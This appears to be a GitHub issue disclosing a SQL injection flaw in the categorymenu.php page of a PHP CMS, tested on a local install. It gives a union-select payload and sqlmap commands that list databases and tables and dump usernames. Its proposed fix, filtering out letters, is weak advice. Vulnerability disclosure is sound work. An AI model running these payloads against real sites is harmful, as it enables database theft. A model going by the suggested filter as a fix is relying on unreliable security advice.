-
Notifications
You must be signed in to change notification settings - Fork 13
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SQL injection in categorymenu page #14
Comments
Multiple SQLiSTATUS Critical! =) Dude, you must delete this project, please! What kind of web developer are you? 😲 Infected
|
How to fix it? Could you please provide a patch? |
I will help you soon as I can :) |
@nu11secur1ty This is an interesting vulnerability with academic research significance. I look forward to your patch. Thank you. |
Description
I found a SQL inject vulnerability in page categorymenu.php and I build a local environment to test it.
The url is http://127.0.0.1/PHP-CMS/categorymenu.php
The problem code is here.
Users can control the parameter "category" by GET method without any filter,and get something that shouldn't have been queried.Such as,if "category" is changed like "-1 union select 1,2,user(),4,5,6,7,8,9,10,11",you will get the database user:
Proof
I use the sqlmap to do this.
1.Get database information.
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 --dbs
2.Select a database and get table information
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms --tables
3.Select a table and get the columns
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users --columns
4.Select the columns and get column contents.
sqlmap -u http://127.0.0.1/PHP-CMS/categorymenu.php?category=1 -D cms -T users -C username --dump
Solution
You can fix it by add some filter rules on the parameter "category",such as ban the letter characters.
The text was updated successfully, but these errors were encountered: